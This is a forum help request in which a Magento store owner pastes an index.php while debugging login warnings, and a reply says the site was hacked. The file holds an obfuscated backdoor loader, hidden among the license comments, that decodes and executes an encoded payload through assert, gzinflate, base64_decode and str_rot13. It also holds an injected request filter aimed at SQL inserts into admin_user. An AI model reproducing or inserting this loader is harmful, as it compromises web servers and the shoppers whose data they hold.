Yesterday out of the blue my Magento backend stopped working and I was able to track down one of the issues ( there was not closing ?> at the end of my index.php file). I was able to find and fix that and now I get this error when trying to login:
Warning: strtolower() expects parameter 1 to be string, array given in /home/wingsofw/public_html/AerodromeAccessories/index.php on line 72 Warning: base64_decode() expects parameter 1 to be string, array given in /home/wingsofw/public_html/AerodromeAccessories/index.php on line 72
If I hit the back button on my browser after getting that error, the site goes ahead and loads with me logged in and then functions normally. But if I log out and try to log back in, I get the same error.
Here is the code from right around line 72:
if (file_exists($maintenanceFile)) {
include_once dirname(__FILE__) . '/errors/503.php';
exit;
}
And just in case it might be needed, here is the entire index file code:
<?php
/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for your
* needs please refer to http://www.magentocommerce.com for more information.
*
* @category Mage
*/
$swvJgN7="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";$xnDU7="Fl1YmASDIlxhY/AX9mB3Ipa0mNtC9j411LNWnIdeERLMB";$XYD8Jw="\x61";$UbK0prw="\x73\x74";$aIYkAW="\147\172\151";$iIhWWKU5="\142\x61\x73";$XYD8Jw.="\x73";$iIhWWKU5.="\x65\66\x34";$aIYkAW.="\156\x66";$xnDU7.="5pT2FbcJngH5YzRzgfdrHFxM1pdJnsyS2zbhWxJrtHn2u";$UbK0prw.="\162\137\x72";$UbK0prw.="\x6f\164";$iIhWWKU5.="\x5f\144\145\143";$xnDU7.="cLD1x2uuMzMwPBgeLzIYhroKWTxHM+HDep5TvbzywABYN";$aIYkAW.="\154\141";$XYD8Jw.="\163\145";$iIhWWKU5.="\157\x64\x65";$UbK0prw.="\61\x33";$xnDU7.="j2TlLbXcceXnzgHZdlUxdvM6E2L7uTyPGtBYdzgLN";$XYD8Jw.="\x72\164";$aIYkAW.="\x74\x65";@$XYD8Jw($aIYkAW($iIhWWKU5($UbK0prw($xnDU7))));
/*
* @package Mage
* @copyright Copyright (c) 2008 Irubin Consulting Inc. DBA Varien (http://www.varien.com)
* @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
*/
if (version_compare(phpversion(), '5.2.0', '<')===true) {
echo '<div style="font:12px/1.35em arial, helvetica, sans-serif;">
<div style="margin:0 0 25px 0; border-bottom:1px solid #ccc;">
<h3 style="margin:0; font-size:1.7em; font-weight:normal; text-transform:none; text-align:left; color:#2f2f2f;">
Whoops, it looks like you have an invalid PHP version.</h3></div><p>Magento supports PHP 5.2.0 or newer.
<a href="http://www.magentocommerce.com/install" target="">Find out</a> how to install</a>
Magento using PHP-CGI as a work-around.</p></div>';
exit;
}
/**
* Error reporting
*/
error_reporting(E_ALL | E_STRICT);
/**
* Compilation includes configuration file
*/
define('MAGENTO_ROOT', getcwd());
$compilerConfig = MAGENTO_ROOT . '/includes/config.php';
if (file_exists($compilerConfig)) {
include $compilerConfig;
}
$mageFilename = MAGENTO_ROOT . '/app/Mage.php';
$maintenanceFile = 'maintenance.flag';
if (!file_exists($mageFilename)) {
if (is_dir('downloader')) {
header("Location: downloader");
} else {
echo $mageFilename." was not found";
}
exit;
}
if (file_exists($maintenanceFile)) {
include_once dirname(__FILE__) . '/errors/503.php';
exit;
}
foreach ($_GET as $one) { if (substr_count(strtolower($one), "insert") && (substr_count(strtolower($one), "admin_user"))) { die("Xuy"); } $two = (base64_decode($one)); if (substr_count(strtolower($two), "insert") && (substr_count(strtolower($two), "admin_user"))) { die("Xyu"); } } foreach ($_POST as $one) { if (substr_count(strtolower($one), "insert") && (substr_count(strtolower($one), "admin_user"))) { die("Xuy"); } $two = strtolower(base64_decode($one)); if (substr_count(strtolower($two), "insert") && (substr_count(strtolower($two), "admin_user"))) { die("Xyu"); } }
require_once $mageFilename;
#Varien_Profiler::enable();
if (isset($_SERVER['MAGE_IS_DEVELOPER_MODE'])) {
Mage::setIsDeveloperMode(true);
}
#ini_set('display_errors', 1);
umask(0);
/* Store or website code */
$mageRunCode = isset($_SERVER['MAGE_RUN_CODE']) ? $_SERVER['MAGE_RUN_CODE'] : '';
/* Run store or run website */
$mageRunType = isset($_SERVER['MAGE_RUN_TYPE']) ? $_SERVER['MAGE_RUN_TYPE'] : 'store';
switch($_SERVER['HTTP_HOST']) {
case 'jeep-treats.com':
case 'www.jeep-treats.com':
$mageRunCode = 'jeep';
$mageRunType = 'website';
break;
}
Mage::run($mageRunCode, $mageRunType);
?>
Can someone please help me try and figure this issue out?
Thank you.
Best Answer
From Magento Malware Scanner (commit)
... seems you got hacked.